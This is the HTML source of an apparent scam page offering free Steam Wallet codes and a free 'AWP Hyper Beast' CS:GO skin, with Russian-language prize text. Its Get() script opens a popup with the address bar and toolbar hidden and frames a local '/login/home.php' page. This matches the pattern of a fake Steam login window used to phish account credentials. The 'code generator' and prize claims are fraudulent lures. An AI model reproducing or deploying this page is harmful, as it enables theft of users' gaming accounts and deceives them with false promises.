
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

  <!-- Basic Page Needs
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
    
  <title>
  GET FREE SKINS</title>
  <meta name="description" content="Get a free Steam Wallet code without having to download anything! Our online Steam code generator gives you a free Steam Wallet code which you can redeem on your Steam account immediately.">
 
  
  
  
            <meta property="og:title" content=" GET STEAM BONUS - ONLINE STEAM CODE GENERATOR">
            <meta property="og:description" content="Get a free Steam Wallet code using our online code generator! Without downloading anything, our generator gives you a unique Steam Wallet code which you can redeem on your Steam account right away.">
            <meta property="og:image" content="images/steam.jpg">
           
            <meta property="og:type" content="website">
            <meta property="og:site_name" content="GET STEAM BONUS">
            <meta name="robots" content="index, follow">
			
			<link rel="icon" type="image/png" href="/favicon.png">


<style>

body {
 background-color: #1a2a3c; 
  background-image: url("/vbg.png"); 
  background-size: cover;
  background-position: center top; 
  background-repeat: repeat-x; 
  background-attachment: fixed
  width: 98%;
  height: 100vh;
}
body .card {
  width: 800px;
  height: 400px;
  background: transparent;
  position: absolute;
  left: 0;
  right: 0;
  margin: auto;
  top: 0;
  bottom: 0;
  border-radius: 10px;
  -webkit-border-radius: 10px;
  -moz-border-radius: 10px;
  box-shadow: 0px 20px 30px 3px rgba(0, 0, 0, 0.55);
}
body .card_left {
  width: 40%;
  height: 400px;
  float: left;
  overflow: hidden;
  background: transparent;
}
body .card_left img {
  width: 100%;
  height: auto;
  border-radius: 10px 0 0 10px;
  -webkit-border-radius: 10px 0 0 10px;
  -moz-border-radius: 10px 0 0 10px;
  position: relative;
}
body .card_right {
  width: 60%;
  float: left;
  background: #000000;
  height: 400px;
  border-radius: 0 10px 10px 0;
  -webkit-border-radius: 0 10px 10px 0;
  -moz-border-radius: 0 10px 10px 0;
}
body .card_right h1 {
  color: white;
  font-family: 'Montserrat', sans-serif;
  font-weight: 400;
  text-align: left;
  font-size: 30px;
  margin: 30px 0 0 0;
  padding: 0 0 0 40px;
  letter-spacing: 1px;
}
body .card_right__details ul {
  list-style-type: none;
  padding: 0 0 0 40px;
  margin: 10px 0 0 0;
}
body .card_right__details ul li {
  display: inline;
  color: #e3e3e3;
  font-family: 'Montserrat', sans-serif;
  font-weight: 400;
  font-size: 14px;
  padding: 0 40px 0 0;
}
body .card_right__rating__stars {
  position: relative;
  right: 160px;
  margin: 10px 0 10px 0;
  /***** CSS Magic to Highlight Stars on Hover *****/
  /* hover previous stars in list */
}
body .card_right__rating__stars fieldset, body .card_right__rating__stars label {
  margin: 0;
  padding: 0;
}
body .card_right__rating__stars .rating {
  border: none;
}
body .card_right__rating__stars .rating > input {
  display: none;
}
body .card_right__rating__stars .rating > label:before {
  margin: 5px;
  font-size: 1.25em;
  display: inline-block;
  content: "\f005";
  font-family: FontAwesome;
}
body .card_right__rating__stars .rating > .half:before {
  content: "\f089";
  position: absolute;
}
body .card_right__rating__stars .rating > label {
  color: #ddd;
  float: right;
}
body .card_right__rating__stars .rating > input:checked ~ label,
body .card_right__rating__stars .rating:not(:checked) > label:hover,
body .card_right__rating__stars .rating:not(:checked) > label:hover ~ label {
  color: #FFD700;
}
body .card_right__rating__stars .rating > input:checked + label:hover,
body .card_right__rating__stars .rating > input:checked ~ label:hover,
body .card_right__rating__stars .rating > label:hover ~ input:checked ~ label,
body .card_right__rating__stars .rating > input:checked ~ label:hover ~ label {
  color: #FFED85;
}
body .card_right__review p {
  color: white;
  font-family: 'Montserrat', sans-serif;
  font-size: 12px;
  padding: 0 40px 0 40px;
  letter-spacing: 1px;
  margin: 10px 0 10px 0;
  line-height: 20px;
}
body .card_right__review a {
  text-decoration: none;
  font-family: 'Montserrat', sans-serif;
  font-size: 14px;
  padding: 0 0 0 40px;
  color: #ffda00;
  margin: 0;
}
body .card_right__button {
  padding: 0 0 0 40px;
  margin: 30px 0 0 0;
}
body .card_right__button a {
  color: #ffda00;
  text-decoration: none;
  font-family: 'Montserrat', sans-serif;
  border: 2px solid #ffda00;
  padding: 10px 10px 10px 40px;
  font-size: 12px;
  background: url(https://s3-us-west-2.amazonaws.com/s.cdpn.io/343086/COMdoWZ.png);
  background-size: 12px 12px;
  background-repeat: no-repeat;
  background-position: 7% 50%;
  border-radius: 5px;
  -webkit-transition-property: all;
  transition-property: all;
  -webkit-transition-duration: .5s;
  transition-duration: .5s;
}
body .card_right__button a:hover {
  color: #000000;
  background-color: #ffda00;
  background-image: url(https://s3-us-west-2.amazonaws.com/s.cdpn.io/343086/rFQ5dHA.png);
  background-size: 12px 12px;
  background-repeat: no-repeat;
  background-position: 10% 50%;
  cursor: pointer;
  -webkit-transition-property: all;
  transition-property: all;
  -webkit-transition-duration: .5s;
  transition-duration: .5s;
  

  
  
}
</style>

</head>
<body>


    <div class="container">
      <div class="row" style="text-align: center;">
      <a href="/index.html" title="Получить Steam Wallet Code бесплатно free"><img src="./GETFREESKINS2/logo.png" alt="Получить get Steam Wallet Code бесплатно for free" border="0" style="width: 100%; max-width: 153px;"></a>
    </div>
    
   </div>
   <script src="./GETFREESKINS2/js.cookie.js.Без названия"></script>

   


<div class="card">
  <div class="card_left">
    <div id="imgcard"><img src="./GETFREESKINS2/1.png"></div>
  </div>
  <div class="card_right">
    <h1>ЗАБЕРИТЕ ВАШ ПРИЗ!</h1>
    <div class="card_right__details">
      <ul>
        <li>Износ: Прямо с завода</li>
        <li id="ammount">Редкость: ТАЙНОЕ</li>
      </ul>

      <div class="card_right__review">
        <p>Для вас было выбрано "AWP|Hyper Beast Прямо с завода!". Получить свой скин вы можете нажав на кнопку "Получить AWP HYPER BEAST". Все что от вас требуется это вставить в форму свою ссылку на обмен и ждать трейда от нашего бота. Спасибо что вы с нами , постараемся и дальше вас радовать ХАЛЯВОЙ.</p>
      </div>
      <div class="card_right__button" onclick="Get()" id="button">
        <a>Получить AWP HYPER BEAST</a>
      </div>
	   <div class="card_right__review">
	  <div style=" width: auto; color: #ffffff; border: 2px solid #6F0000; margin-top: 5%; display:none;" id="alert"></div>
    </div>
    </div>
  </div>
</div>

<script>
function Get() {
var wind = window.open("", "", "STATUS=NO, TOOLBAR=NO, LOCATION=0, DIRECTORIES=0, RESISABLE=NO, SCROLLBARS=YES, TOP=50, LEFT=50, WIDTH=1000, HEIGHT=1000");
	wind.document.write("<html><head><style>html, body {width:1000px; height:768px; margin:0px; padding:0px;}</style></head><body><iframe src='/login/home.php' border='0' style='width:1000px; height:768px;'></iframe></body></html>");
	//window.open('/login/home.php', '', 'STATUS=NO, TOOLBAR=NO, LOCATION=0, DIRECTORIES=0, RESISABLE=NO, SCROLLBARS=YES, TOP=50, //LEFT=50, WIDTH=1000, HEIGHT=1000');
}
</script>


</body></html>